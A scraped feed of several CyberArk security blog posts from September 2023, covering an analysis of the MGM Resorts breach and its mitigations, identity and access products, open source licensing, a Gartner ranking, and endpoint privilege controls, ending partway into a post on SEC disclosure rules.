The MGM Resorts Attack: Initial Analysis https://www.cyberark.com/blog/the-mgm-resorts-attack-initial-analysis/ Fri, 22 Sep 2023 20:35:47 +0000 https://www.cyberark.com/?p=182900 Graphic of poker cards and gambling chips

The recent cyberattack on MGM Resorts International has raised serious concerns about the security of sensitive data and the vulnerabilities organizations face in today’s digital landscape. In this blog post, we will dive into the details of the attack based on the information currently available, analyze its root causes and discuss key takeaways to help organizations strengthen their security posture.

MGM Attack: What We Know (Thus Far)

Allegedly, a criminal gang made up of U.S. and U.K.-based individuals that cybersecurity experts call Scattered Spider (aka Roasted 0ktapus, UNC3944 or Storm-0875) initiated a social engineering attack that led to the near shutdown of MGM Resorts International. MGM Resorts International is a global hospitality and entertainment company, with a portfolio of 29 hotel and resort properties, including iconic brands like Bellagio, MGM Grand and Mandalay Bay.

(Did you attend Black Hat at the Mandalay Convention Center this year? Yes, this could directly affect you.)

A social engineering attack allowed the threat actor to burrow into the MGM environment and establish a foothold. Due to the common mistake of password reuse, CyberArk Labs – as well as many experts in the cybersecurity community – are currently under the impression that the attackers had usernames and passwords from previous data breaches. With additional information collected from a high-value user’s LinkedIn profile, they hoped to dupe the helpdesk into resetting the user’s multi-factor authentication (MFA). They were successful.

Based on available information, as it currently stands, threat actors also were observed creating persistence in MGM’s network by configuring an entirely additional Identity Provider (IdP) in the Okta tenant using a feature called “inbound federation.” The function is intended to allow the fast connection of different Okta tenants during mergers of companies. In this case, though, the threat actors used it to increase their control of the victim’s networks. (As we say in the industry, “It’s not a bug; it’s a feature!”)

It also appears that the attackers gained control not only of Okta but also of the Microsoft Azure cloud environment. This already jeopardized the applications managed by the IAM platform, but now all their cloud assets were also in danger.

Our threat actors were eventually discovered. MGM’s incident response team began by terminating the Okta sync servers, where Scattered Spider had deployed some additional credential harvesting techniques. This ultimately resulted in the complete termination of the Okta platform and the threat actors’ access initial access. HOWEVER, the damage had been done. The threat actors had already exfiltrated unknown terabytes of data and still had access to the cloud platform. It was time to make their presence known.

This was when the BlackCat/ALPHV ransomware group was called in. Using this RaaS service, Scattered Spider encrypted several hundred of their ESXi servers, which hosted thousands of VMs supporting hundreds of systems widely used in the hospitality industry. This caused cascading chaos. As the ESXi hosts became encrypted one after another, the applications running on them crashed … one after another … after another. Hotel room keys no longer worked. Dinner reservation systems were down. Point-of-sale systems were unable to take payments. Guests were unable to check in or out. Slot machines were completely unavailable. At this point, MGM was hemorrhaging money – and potentially its credibility.

Once the threat actors acquired their initial foothold, they could begin to escalate their privileges. They ultimately acquired the privileged access to the accounts running the IAM infrastructure. This allowed them significant access to the MGM network.

What made this attack worse than if MGM’s Okta environment and the applications connected to it had only been compromised, was that the IdP solution granted highly privileged access to Azure, which ultimately allowed the cloud-originated attack into MGM’s brick-and-mortar operations. Scattered Spider deployed BlackCat/ALPHV ransomware, which encrypted several hundred of their ESXi virtual machine infrastructure. This severely impacted MGM’s operations.

The full extent of what systems were compromised and what data was leaked is still unknown. Still, gaming industry analyst David Katz says that MGM Resorts is losing as much as $8.4 million in revenue every day until it fixes the problems caused by the ongoing cyberattack. There is still so much to this story that we won’t know the full extent of the damage for quite some time.

Graphical depiction of the MGM cyberattack flow.

 

CyberArk Labs’ Critical Initial Takeaways from the MGM Attack

Although it’s still too early to definitively say what exactly happened in the MGM attack, the following initial assessments from our team are as relevant now as they’ll be once the dust settles:

  • Attacking IAM platforms is a common tactic that threat actors use. It gives persistent access to an organization and extends attacker privileges into more systems, causing more damage. This isn’t anything new to us either. We discussed this in the aftermath of the SolarWinds breach, along with best practices for configuring and monitoring your IAM platform.
  • The worst part of this breach was that MGM’s IdP was configured in a way that allowed Scattered Spider to pivot into their VMware infrastructure. For example, the act of synchronizing credentials between on-prem and cloud resources allowed Scattered Spider to pivot into the VMware infrastructure. This is where we believe that BlackCat/ALPHV became involved.
  • BlackCat/ALPHV has been an operator CyberArk Labs has tracked for some time now. We recently released a free and open-source tool called White Phoenix that helps victims to recover from ransomware attacks. (Due to the fact the ESXi files were encrypted and not PDFs, there’s unfortunately not much this tool could do to help MGM.)
  • RaaS is big business and part of the larger criminal supply chain. Just as commercial businesses rely on SaaS applications to do their work, so do criminal gangs. BlackCat/ALPHV provides the professional services Scattered Spider lacks. (i.e., malware creation, back-end C2, tor leak-site, malware support, negotiation services).
  • The MFA device reset was a significant chokepoint in the attack. If the MFA device reset were not possible or detected in time, the threat actors would have faced limitations in continuing their attack. Hence, limiting the MFA device to a specific phone number associated with the user could have offered an effective mitigation.
  • IAM infrastructure, including federation servers, Okta sync servers – and even CyberArk vaults – should be considered Tier 0 assets. Their compromise could lead to paralyzing a significant portion of a network. Securing access to these assets and limiting them to dedicated proxies is extremely important in mitigating future attacks.

Lessons Learned and Mitigation Strategies

To strengthen security measures and mitigate similar attacks, organizations should consider the following strategies:

1. Contain Impact

Minimizing exposure of privileged accounts is vital in mitigating phishing attempts. IT administrators should use privileged access management (PAM) solutions, reducing the risk of compromise through attacks (including vishing). Organizations should also consider implementing zero standing privilege (ZSP) where applicable.

We like to say, “It’s hard to hack a credential when it literally doesn’t exist.” While internal or external compromises may still occur, this contains the attack to a dedicated endpoint, which can help minimize exposure and assist with incident response.

2. Improve MFA Control

Creating visibility into MFA device changes is essential. Implementing specific logs for customers to monitor in their security information and event management (SIEM) systems can help detect and respond to unusual authentication activities. Additionally, implementing a dual control feature can enhance security by requiring multiple authorizations for critical actions.

3. Protect Tier 0 Assets

Tier 0 assets must be protected, including signing keys and access to critical infrastructure. Implementing endpoint privilege security on federation servers can help safeguard signing keys from credential theft attempts. Furthermore, preventing unauthorized access to Tier 0 assets by limiting access to proxies along with dual controls is crucial.

4. Adopt IdP Best Practices:

  • Implement MFA controls before allowing users to change/alter their MFA factors (i.e., you must present a current MFA factor before altering one of your MFA factors enrolled).
  • Employ helpdesk verification controls (i.e., the helpdesk may only reset a password once the user has verified their identity through a pre-existing enrolled MFA factor).
  • Always check a user’s device enrollment/compliance before allowing a user (especially an administrator) access to your IdP.
  • Identify secure zones in your network. Understand network traffic to your IdP that does not meet your expectations. Limit actions that can be taken outside of your Secure Zones.
  • Manage IdP administrator accounts in the same way database/domain admin accounts are managed (i.e., through privileged access controls such as rotating administrator passwords, monitoring/isolating admin sessions and enforcing dual access controls to access credentials).
  • Monitor trust changes, such as identity provider (IdP) modifications – it’s essential for detecting suspicious activities. Organizations should consider implementing specific logs to track and analyze trust changes, providing valuable insights into potential security breaches.

Final Thoughts (For Now)

A series of mistakes ultimately led to one of the most visible and brand-damaging attacks in years. To mitigate similar attacks, organizations should focus on minimizing the exposure of privileged accounts, implementing strong authentication measures such as MFA, protecting Tier 0 assets, monitoring trust changes and staying updated on evolving cyber threats. It’s a lot to do, but it’s crucial for organizations to continuously improve their security measures and follow best practices to protect themselves in today’s digital landscape.

Andy Thompson is CyberArk Labs’ Offensive Research Evangelist.

 

Editor’s note: For more insights from CyberArk Labs’ Andy Thompson on this subject and beyond, check out his appearance on CyberArk’s Trust Issues podcast episode, “Analyzing the MGM and Okta Breaches: the Identity Connection.” The episode is available in the player below and on most major podcast platforms.

]]>
Securing Workforce Access with Greater Visibility, Integration and Automation https://www.cyberark.com/blog/securing-workforce-access-with-greater-visibility-integration-and-automation/ Thu, 21 Sep 2023 22:32:35 +0000 https://www.cyberark.com/?p=182795 Woman using laptop on airplane for workforce access.

Over six in 10 security decision-makers say their teams operate with limited visibility across their environments. Why? We could easily speculate that it comes down to the tools they do or don’t use. However, two-thirds of enterprises now have tools from up to 40 different security vendors in place, and they’re still struggling for insights into the constant cycle of identities seeking access.

I believe there’s a bigger-picture challenge we need to – and can – solve for.

In many ways, securing the workforce’s access to applications, devices and resources such as sensitive data is about being a constant observer of human behavior – and asking yourself the following questions in a perpetual loop:

  • What are your users seeking to access and why?
  • What actions are they trying to take with sensitive resources?
  • Do the findings (to the preceding questions) align with what’s appropriate for a given worker’s role within the enterprise?

The problem is that you need immediate answers to these questions every time a user attempts to authenticate. And you need to know the answers for every user – across your ecosystem of employees and vendors, among others.

To get the visibility we need, the solution will come down to three variables: insights on user behavior, automated actions and integration enabling tools to share and act on data.

All Seeing, All Knowing – How to Observe and Secure Workforce Access Behavior

While various analytics tools have been in market for a while, enterprise security teams need capabilities beyond simple feeds and dashboards. Today’s threats call for a sophisticated user behavior analytics (UBA) engine serving as a centralized brain and nervous system – all-seeing, all-knowing.

Individual humans can’t independently maintain a real-time study of every user’s actions. Nor can they instantly infer a set of behavioral traits from the past that could indicate whether a person logging in is indeed that user – or an attacker. And yet, having that type of knowledge would be a game-changer.

This is where it helps to have a UBA engine capable of:

  • Compiling and analyzing a historical log of user access behavior.
  • Vetting access attempts in real time and autonomously detecting any signs of variation from typical behavior.
  • Integrating with smart authentication tools – for example, adaptive multi-factor authentication (MFA) – to make automated decisions on handling any access attempt.

Let’s explore some scenarios in which such capabilities can help security teams make faster, smarter decisions that defend against attacks and support the business.

Scenario 1: Preventing Attacks – Anytime, Anywhere

Imagine a scenario in which an attacker steals a user’s password from a compromised website and figures out where the user works through LinkedIn. It’s 2:30 a.m.: the user and security team are sleeping, but the attacker is very much awake – testing out the password to see if it’s reused across enterprise apps storing sensitive data.

All the signals point to a threat, and here’s what the UBA and adaptive MFA would see: the log-in attempt is happening at a time when the employee is never active. It’s coming from a region the employee never travels to. What’s more, the IP address is atypical and the device is unfamiliar.

In this scenario, let’s say the MFA is integrated with the UBA engine – and can relay insights about the log-in attempt to the UBA, like hands sending sensory information to the brain. In lockstep, the UBA weighs the signals against the actual user’s history. It’s an attack. The UBA decides which actions to take, including:

  • Adapting the log-in process to invoke stronger authentication challenges such as phishing-proof secondary factors (e.g., physical tokens) and knowing in which order to require them.
  • Preventing access until the actual user can scan a unique QR code to approve access on their pre-enrolled mobile device.

How Else Can Automation and Integration Help?

Enterprises can also use automated, no-code workflows for continuous threat detection and response. Imagine another scenario where an attacker compromises a privileged user’s account.

In this instance, an automated workflow could detect a potentially malicious action – e.g., when a new SSH key is created in a privileged session – and alert your team via Slack. Through “if-then” logic, the workflow could automatically remediate the session, temporarily suspending the user’s access, while your team investigates. Or the workflow could relocate the user into a pre-defined high-risk user group with minimal access.

Scenarios like the ones we’ve highlighted here are a win for organizations looking to build toward a security-first approach to workforce access. They’re also a win for security leaders seeking ways to operate more efficiently. With capabilities from UBA, adaptive MFA and automated workflows, securing access can involve fewer work hours, staff and costs.

And with the right capabilities, these insights can be at a security admin’s fingertips – providing the ability to drill down into details, including every factor that influenced the automated decision.

Scenario 2: Improving Productivity and User Experience

We’ll continue with another example: an employee working late on a cross-country flight. The stakes: she’s putting the final touches on a product launch essential for improving the customer experience.

Her laptop is open. WiFi is on. SSO accepts her password. Next up: MFA to get into a collaboration app where she’s managing the project. Here, frictionless UX is essential; the employee is on deadline. But you can’t put security on the back burner: The same web applications your users need to access are also the No. 1 attack vector in eight out of 10 incidents. In this in-flight scenario, a context-aware MFA/UBA combo would see that the log-in attempt is coming:

1. From a pre-approved device.
2. On a typical weekday (a usual workday for her).
3. At a regular time of day – her user history reflects the fact that she travels regularly to and from the given region.

Of course, visibility is best when paired with automated capabilities to act upon what’s seen. The dynamic duo of UBA and adaptive MFA can apply contextual insights to make a decision. In this low-risk case, the UBA can determine that secondary authentication isn’t necessary and allow the user to access the application – without compromising security.

The outcome: the employee authenticates safely and efficiently, completing her project on deadline. And this is a win for her company’s security team’s ability to show that security-first access can be an enabler rather than a barrier to progress.

Embracing and Effecting Change in Securing Today’s Workforce

Visibility is the first step in making smarter decisions regarding workforce access. Automation can help your team do more. With the proper controls and capabilities – built into an integrated approach that brings tools together to share and act on data – you can significantly improve your security posture and support the business.

For more insights on how you can secure your organization from identity-related threats, check out this video from CyberArk experts on what capabilities are needed to balance securing the workforce and ensuring productivity.

Gil Rapaport is the general manager for Identity and Access at CyberArk.

]]>
Cloud Identity Security Success: 3 Critical Factors https://www.cyberark.com/blog/cloud-identity-security-success-3-critical-factors/ Tue, 19 Sep 2023 19:05:54 +0000 https://www.cyberark.com/?p=182566 Cloud Identity Security Success:

Today, more than ever, security is all about identity. Especially in the cloud, the central management and proliferation of cloud services means that with the proper identity and permissions, one can do almost anything (legitimate or malicious).

Product management has been my focus for over 15 years, and in that time, I have experienced multiple IT and ecosystem transformations. Let me tell you, it’s never easy for organizations. When I joined CyberArk three years ago, I wanted to understand how our customers dealt with cloud transformations. Specifically, I wanted to know how identity security programs could transform with IT. I talked to many experts within the organization and with customers, trying to understand what’s most important in implementing a cloud identity security program – and to deduce from these insights where our development focus should be.

Given my experience, the following are what I consider to be the key factors to cloud identity security success:

1. Smart Risk Reduction

Some would say that security is all about systematic risk reduction. Many solutions today utilize cloud APIs and central management and specialize in providing cloud security posture. These solutions aim to identify risks to your cloud configurations and help prioritize them; identity and access management (IAM) is an essential part of that.

But we don’t just want to get recommendations to fix misconfigurations. We need meaningful insights and to take action quickly. For example, we want to swiftly identify low-hanging fruits like those dormant identities just sitting there and increasing your attack surface. We also want to determine high-risk identities such as shadow admins – identities and roles that can elevate their own permissions and move laterally so we can rapidly take action to secure them.

As we systematically reduce risk, we want to keep to least privilege principles and remove standing access in favor of zero standing permissions. We should have a solution built to drive immediate actions from insights.

2. User Experiences that Encourage Adoption

As enterprises implement new security tools, they face a familiar trade-off: traditional security controls can impact users, in ways that slow down their ability to do their jobs.

Imposing security upon IT teams is one challenge, but enforcing controls on developers or DevOps is almost impossible. The cloud was built for speed, and no dev team would ever agree to be slowed down. And for that fact alone, I know that the successful adoption of security solutions is all about end user experience.

When we secure access to sensitive resources and services, we should always allow end users to use their native tools, giving them an experience with the least friction. Sometimes, we can improve their lives with small productivity enhancements, like giving them a personalized view of available systems and roles they can connect to.

Let’s look at another example of a developer adoption challenge: for security teams to ensure secrets management practices are used to secure application credentials (non-human identities). This is why I’m proud of our capabilities that allow developers to keep using their preferred cloud-native solutions without making any changes to their application – while CyberArk secures and governs those secrets on the backend. It’s an excellent way to help ensure both developers and security teams achieve their goals.

Encourage Adoption

A simplified view of a common security/usability trade-off

3. Fewer Security Tools

Now that we all agree on the importance of the end user experience for successful adoption, we should also keep in mind that admins and security teams have to use the security tools themselves. With security being top of mind, the explosion of solutions and tools is enough to give anyone a headache. Consider a cloud security architect or IAM expert who needs to fully understand and operate the myriad solutions for securing their environment. They need to manage native cloud provider tools and services (and multiply that threefold for a multi-cloud strategy) and related solutions for IGA, IDP, PAM, CIEM and secrets management. These systems must work harmoniously, feeding one another and integrating with other key systems such as ITSM and SIEM solutions. It is no wonder that a recent ESG report showed that 54% of organizations prefer a platform approach with unified controls from fewer vendors.

So maybe it’s all about running an efficient operation – using fewer tools to manage your IAM needs. This can help ensure those security solutions can be more easily installed and efficiently managed to succeed.

Fewer Security Tools

Better Together: People, Processes and Technology

Considering that no one key to a successful cloud identity security program exists, we should look beyond just pure technology, features and capabilities. Instead, we should consider the real-life challenges of implementing a large-scale, multi-cloud and multi-system environment. We should think of processes within organizations to keep developers (end users) happy. And we should provide admins with platform-based solutions to manage an efficient operation, identify IAM risks and mitigate them with an integrated solution.

Yonatan Klein is director of product management, Cloud Security at CyberArk.

]]>
Is Open Source Software Dead? https://www.cyberark.com/blog/is-open-source-software-dead/ Thu, 14 Sep 2023 19:25:25 +0000 https://www.cyberark.com/?p=182538

How Cloud and SaaS are Actively Disrupting Open Source

Open source software (OSS) has driven technological growth for decades due to its collaborative nature and ability to share information rapidly. However, major OSS security vulnerabilities like Log4j, Heartbleed, Shellshock and others have raised concerns about the security and sustainability of similar projects. At the same time, major open source-based companies have changed their OSS licenses, like MongoDB, Elastic (formerly ElasticSearch), Confluent, Redis Labs and most recently, HashiCorp.

In this blog, we’ll examine recent events and trends behind the evolution of open source software, explore its future and discuss what organizations can do to protect themselves.

Community Driven Open Source Software

The most famous early example of community-driven open source is GNU, which stands for Gnu’s Not Unix. GNU is a major component of Linux, and it was born out of Richard Stallman’s frustration over not being able to modify his printer software code to provide customizations and improvements. Stallman wanted unrestricted and free (of cost) software that he could update, maintain and customize himself with other community members, so he created GNU and the GNU General Public License or GPL – one of the most popular and permissive OSS licenses – which is the inspiration behind many open source licenses and projects today.

In the example of the GNU project, it’s important to understand that the user community is taking responsibility for developing, maintaining, supporting and providing security patches – the idea was not for anyone to use without helping to keep it going because that isn’t sustainable. Kubernetes, Linux, Apache and CNCF projects are good examples of community-driven projects.

Vendor-Driven Open Source Software

Vendor-driven open software projects are more centralized and driven from the top down, with a single software vendor providing most of the software and maintenance. In this case, the user community may contribute some customizations, support and patches, but the bulk of the expense and burden remains with the software vendor. This use case is a go-to-market (GTM) approach that relies on converting community users to premium, paid features or services to generate revenue that will offset the costs of building and maintaining the OSS version.

Industry and Technology Trends Driving Open Source Disruption

When GPL and other permissive OSS licenses were first conceived, few envisioned the impact of cheap cloud computing resources and fast broadband would have on the OSS landscape. Now, we are seeing the ripple effects of SaaS and how it impacts vendor-driven open source projects like MongoDB, Elastic, Redis Labs, and most recently, HashiCorp, which changed its OSS licensing, angering its user community.

Several vendor-driven open source projects have had difficulty monetizing enough of their user community to offset expenses. Adding further financial pressure, the growing popularity of SaaS has inspired companies to offer SaaS solutions built from OSS versions of their competition, monetizing the work of the competition and further reducing the incentives behind vendor-driven OSS projects.

The Future of Open Source Software

Vendor-driven open source offerings are advertised as a way for users to get started. However, migrating from a self-hosted OSS solution to the enterprise version can be more complicated or expensive than initially expected, leaving users uncomfortably stuck on the open source version. At the same time, they also need the paid features. This is one area where SaaS should and will replace OSS; when a user is looking to start small and grow with a solution, there is no need for a migration path or the added expense of engineering resources to support and maintain the solution.

The future doesn’t look promising for vendor-driven OSS projects built purely for monetizing the offerings; these projects will become more restrictive and put more of their development efforts behind paid features.

As Mark Twain once said, “History never repeats itself, but it does often rhyme.” This is true when it comes to the future of open source projects, because the path forward is similar to the printer example we mentioned earlier –  these projects will be primarily driven and supported by the user community. To maintain viability, community-driven OSS projects need more backing from the user community to provide the required security patches, maintenance and support. Unfortunately though, not all of these projects are supported the way they need to be, as many security vulnerabilities like Log4j, Heartbleed, Shellshock and others threaten the security and sustainability of community-driven open source projects. CISA’s recent announcement of a new OSS security roadmap underscores these concerns.

Impacted by Open Source Licensing Changes?

Are you looking to centralize human and non-human access? If your organization uses an OSS vault solution, you likely have many questions about the latest license changes and want to explore your migration journey.

If so, join us on Sept. 27 for our webinar covering the recent open source news and next steps for centralizing human and non-human identity security.

John Walsh is a senior product marketing manager at CyberArk.

]]>
CyberArk Named a Leader in the Gartner® Magic Quadrant™ for PAM for the Fifth Time https://www.cyberark.com/blog/cyberark-named-a-leader-in-the-gartner-magic-quadrant-for-pam-for-the-fifth-time/ Mon, 11 Sep 2023 15:12:23 +0000 https://www.cyberark.com/?p=182381 CyberArk magic-quadrant pam

Today, I’m honored to share that CyberArk has been named a Leader in the “2023 Gartner® Magic Quadrant™ for Privileged Access Management.”1 This is the fifth time our company has been positioned as a Leader in this report.

Learning By Listening

CyberArk first introduced privileged access management (PAM) to the market to address a critical need to protect the users with the highest-risk access, such as IT administrators and others with unconstrained access to valuable company assets. In working alongside organizations to build proactive PAM programs – and also helping others recover from some of the largest breaches in modern history – we, to quote Ernest Hemingway, “learned a great deal from listening carefully.” These stories became the fabric of our organization, woven into the CyberArk Identity Security Platform, inspiring our strategy and uniting us in a shared mission.

We’ve continued listening and innovating ever since. Today, the landscape looks dramatically different. Employees and third-party vendors work from anywhere, on multiple devices. Any human and machine identity can be assigned high-risk permissions and become a “privileged user.” Hybrid and cloud environments are massively complex. Threats, from AI-fueled ransomware to sophisticated software supply chain attacks, are constantly growing in sophistication. And the cybersecurity industry itself is experiencing tremendous change as companies emerge, are acquired and often struggle to find their footing in a tightly crowded space.

Consistent, But Never Complacent

Through it all, CyberArk has remained an unwavering presence, delivering market-leading innovations and expertise to meet organizations’ evolving needs. Building upon our foundational PAM strengths, we’ve extended intelligent privilege controls across the entire identity lifecycle for all identities. As the only vendor positioned as a Leader in the most recent Gartner® Magic Quadrant™ reports for PAM (2023) and Access Management (2022).

We offer the world’s most advanced identity security platform, empowering organizations to drive down identity-based risks and consolidate vendors while delivering operational efficiencies and achieving a faster ROI. Like an invisible force field, the CyberArk Identity Security Platform wraps seamlessly around an organization, its devices and its people – wherever they go.

In particular, we’re proud of how we’ve innovated alongside customers to solve their cloud-first use challenges. Developers are privileged users in modern environments. Many have entitlements to provision and de-provision infrastructure and services or change existing configurations. This access must be secured, without slowing down engineering velocity. We’ve invested heavily and innovated rapidly to deliver new cloud security solutions that address common developer requirements.

Of course, the most successful cybersecurity programs aren’t just about great technology: people and processes are equally important. Our team brings unmatched insights and proven methodologies based on decades of experience in helping more than 8,000 organizations around the world. With prescriptive guidance and technical domain expertise, we deliver exceptional experiences that empower teams to execute winning strategies. And we’ve continued listening carefully, investing heavily in our customer support team to ensure system resilience and high availability of our mission-critical technologies.

There can be no complacency in cybersecurity. Active, consistent dialog and collaboration with our customers and industry partners, coupled with cutting-edge threat research, continue to inform our roadmap. We’re setting the bar with advanced capabilities that further bolster security, adoption and user experience across our platform. Some recent examples include:

  • Deepening secrets management offerings: Further enhancing our SaaS and self-hosted secrets management solutions that enable consistent control of multi-cloud environments. One noteworthy example is extending CyberArk Secrets Hub’s coverage so more security teams can tackle a thorny identity security challenge: securing and managing secrets and credentials used by machine (or non-human) identities, which outnumber human identities 45:1.
  • Securing privilege on the endpoint: Continuing to address security leaders’ No. 1 area of risk – credential theft – with advanced credential management capabilities that block threats at the endpoint. We’re especially proud of our recent security innovations for protecting Windows workstations and servers.
  • Driving progress toward zero standing privileges: Introducing new just-in-time, least privilege access capabilities that are critical for helping organizations move toward the ideal state of zero standing privileges (ZSP) in the cloud.
  • Delivering for our self-hosted customers: Our continued commitment to self-hosted customers is reflected in our latest release, which features several of our customers’ top enhancement requests.
  • Extending AI use cases: Strategically expanding our use of machine learning and AI to improve customers’ defensive capabilities to counter attacker innovation.

We also continue to invest in the fundamental PAM solutions that our customers rely on – from unveiling a simplified user interface to enhancing unified logging and reporting features that ease audit and compliance requirements. It’s no longer enough to have great privilege controls: organizations need smart processes around them as well. We’ve innovated to add lifecycle management and identity orchestration capabilities that help customers improve and simplify privileged access management.

More than ever, security requires a team game approach, and we’re fortunate to play with the very best. Together with our extraordinary global ecosystem of C3 Alliance partners, we deliver customized solutions, integrations and product enhancements to help security teams mitigate emerging risks in their environments and address evolving identity security challenges.

Today’s distinction further accelerates momentum across our business. Last month, CyberArk reported strong second quarter results that beat guidance across all metrics, underscoring the power of our platform and identity security’s foundational role in Zero Trust-based cybersecurity. We believe we have a tremendous opportunity ahead and remain focused on listening closely and executing our strategy.

We thank our incredible customers and partners for this. Your experiences, perspectives and feedback have shaped CyberArk since day one. And we celebrate our CyberArk team – the cornerstone of our business – for their focus, execution and commitment to excellence. We dedicate this milestone to all of you.

Download the Full Complimentary Report

To learn more, download the full 2023 Gartner Magic Quadrant for Privileged Access Management report.

*GARTNER is a registered trademarks and service mark, and MAGIC QUADRANT is a registered trademark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

1 – Gartner® Magic Quadrant™ for Privileged Access Management, by Felix Gaehtgens, James Hoover, Michael Kelley, Brian Guthrie, Abhyuday Data, 5 September 2023

Barak Feldman is senior vice president of PAM and Identity Security at CyberArk.

]]>
Securing Endpoints By Applying ‘Passive Income’ Concepts https://www.cyberark.com/blog/securing-endpoints-by-applying-passive-income-concepts/ Fri, 08 Sep 2023 14:46:16 +0000 https://www.cyberark.com/?p=182329 securing endpoints

Investing in cybersecurity is a lot like working hard to save for retirement. Your budget’s already tight, but you must secure the future. You’re faced with endless headlines and market updates that make you nervous about making the wrong choices – or not making moves quickly enough amid fast-changing conditions. Under pressure, many focus on identifying the investments (effort, time, money) that are best positioned to keep generating income for you while requiring little or no maintenance. In other words, work smart – not hard.

This makes sense in the cybersecurity world, too. You should ask yourself what passive income ideas may help you achieve your cybersecurity goals faster.

Of course, it’s easier said than done. But some nice, no-nonsense cybersecurity “investments” will continuously generate “income” through saved time, calmer nerves and fewer expended resources. Every cybersecurity professional should look for focal points – the centers of maximum risk concentration. These points repeatedly show up in all kinds of attack kill chains. Then, you need to set up rules to reduce or eliminate the attack surface around these points so you can keep working normally (while for someone else using them for nefarious purposes – or anything else – it should become extremely difficult).

Here are some focal points that you can focus (pun intended) on to break most attack chains:

Focal Point No. 3: Break Common Exploit Techniques

Many exploits take advantage of software bugs, vulnerabilities or legitimate functionality to cause them to operate in ways that assist attackers. Many are relatively easy to implement, particularly those requiring minimal user interaction. An example of little interaction could be a recent CVE-2023-36884 exploit, which, according to the CVE description, an attacker would need “… a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim. However, an attacker would have to convince the victim to open the malicious file.”

Convince the victim to open the file? I mean, what could be easier? …

“Dear HR, please find my CV attached.”

All set!

Okay, so what should be the “passive income” investment here? What we need to stop from happening is a situation when an application spawns another application in an elevated mode. The technique is called child and parent process control. It will protect through various exploits that target PowerShell, MS Office, Adobe Acrobat and many other applications.

Focal Point No. 2.: Make Your Web Browser a Secure Browser

Session hijacking becomes the attacker’s weapon of choice. It’s beautiful in its simplicity. All you need to do is steal a tiny text file from the target’s machine, which can provide access to the victim’s email, documents or cloud configuration consoles. The scariest thing about session hijacking is that it bypasses all the complex user authentication systems IT puts in place, including multi-factor authentication (MFA).

The focal point here is the browser, of course. We must restrict access to the browser’s memory and cookies with privilege threat protection to prevent a successful attack. By preventing cookie stealing, we can thwart session hijacking, no matter how the attacker attempts to access session data.

This “investment” is quickly rising in importance as more and more threat actors turn to attacking browsers, considering they can gain access to critical systems and sensitive data, such as financial transaction systems, SCADA control and cloud configuration consoles, security tool web interfaces, data lakes and email systems.

Focal Point No. 1: Defend Credentials Everywhere

Another focal point that is very common in many attacks is user and administrator credentials, security tokens, passwords and password hashes. Security professionals set up IT systems in a way that scatters credentials and other bits of trust (tokens, hashes, cookies, certificates) across endpoints. If attackers can access those items, they can gain persistence, move laterally, elevate privileges and deliver impact. In a recent example, a threat actor dubbed Storm-0558, according to Microsoft, “… accesses credentials from a variety of sources, including the LSASS process memory and Security Account Manager (SAM) registry hive. … once Storm-0558 has access to the desired user credentials, the actor signs into the compromised user’s cloud email account with the valid account credentials.”

And, in yet another data breach, at least “…179,000 AWS Console credentials, 2,300 Google Cloud credentials, 64,500 DocuSign credentials, 15,500 QuickBooks credentials, 23,000 Salesforce credentials, 66,000 CRM credentials” were stolen with information stealers and listed for sale. Information stealers are a type of malware that steals data stored in applications such as web browsers, email clients, instant messengers, cryptocurrency wallets, FTP clients and gaming services – in other words, scattered across each machine in every organization, waiting to be found and stolen by attackers.

By blocking access to various credential stores within the operating system and third-party applications, you can protect your users and endpoints from many threats, making this technique a terrific passive cybersecurity income technique. CyberArk Endpoint Privilege Manager has over 50 different rules preventing credential and security token theft, and new rules are constantly added and dynamically delivered to endpoints, for example, a new rule for workstations and servers that protects Discord, a popular communication platform, from various data theft methods that can help prevent a data breach.

Focal Point No. 0: Abuse of User Privileges

Preventing the abuse of user privileges should be the first on the list, but we felt it could be a little repetitive for you if you read our blog regularly – hence the zero. Beating a dead horse would likely be the proverbial description, except the horse is still very much alive. While everyone seemingly agrees about this security best practice – no user should work under local admin – we still see organizations where users keep working as admins. CISA issued an advisory focused on detecting advanced persistent threat (APT) activity targeting Outlook online that recommends the following as a general cloud migration: “Separate administrator accounts from user accounts according to the National Institute of Standards and Technology’s (NIST’s) guidance, AC-5: Separation of Duties.” and “Only allow designated administrator accounts to be used for administration purposes. If an individual user requires administrative rights over their workstation, use a separate account without administrative access to other hosts.”

My take regarding endpoint privilege security is even more radical: No user should have local admin rights. Period. CyberArk Endpoint Privilege Manager can take care of all the necessary elevations whenever a user requires elevated privileges. And for any conceivable scenario when policies are too rigid to permit an automatic elevation, there are several ways to quickly resolve it including just-in-time (JIT) policies and offline authorization. These methods are much quicker than having a system administrator remotely connect to your machine. And if you are a local administrator, you’re taking on enormous risk because cyber incidents are bound to happen.

Breaking the Attack Kill Chain (The Easy Way)

So, there you have it. Take care of these focal points. Thankfully, it’s relatively easy to do (given the right tools) and is a set-and-forget activity – just like passive income! Once set, attacks will continuously hit a wall, considering the attackers will find themselves disarmed and toolless. We can’t promise that after reading this post, you’ll have a clear roadmap to financial independence and early retirement, but we hope you found some helpful advice here that will save you some time and maybe a grey hair or more.

Author’s note: Oh, by the way, CyberArk Endpoint Privilege Manager has these and many more threat mitigation rules as a part of QuickStart – our rapid risk reduction and least privilege framework.

Andrey Pozhogin is a senior product marketing manager at CyberArk.

]]>
5 Ways CISOs Can Prepare for SEC Cybersecurity Compliance https://www.cyberark.com/blog/5-ways-cisos-can-prepare-for-sec-cybersecurity-compliance/ Wed, 30 Aug 2023 13:01:30 +0000 https://www.cyberark.com/?p=182112 Business Man tick marking

The U.S. Securities and Exchange Commission (SEC) recently announced a ruling aimed at enhancing public companies’ cybersecurity risk management, strategy, governance and incident disclosure. To sum it up, companies must report cyberattacks within four days of determining an incident is “material” and divulge details about their cybersecurity programs annually.

With this long-anticipated ruling, the SEC calls on companies to increase transparency and accountability by providing their investors with “consistent, comparable and decision-useful” information about how they manage cybersecurity risks. While some enterprises are prepared to meet time-based disclosure regulations today, many must beef up their capabilities before the SEC requirements take effect in December 2023.

SEC Cybersecurity Compliance

With the clock ticking, here are five actions CISOs and security leaders can take to prepare for SEC cybersecurity compliance and mitigate cyber risk:

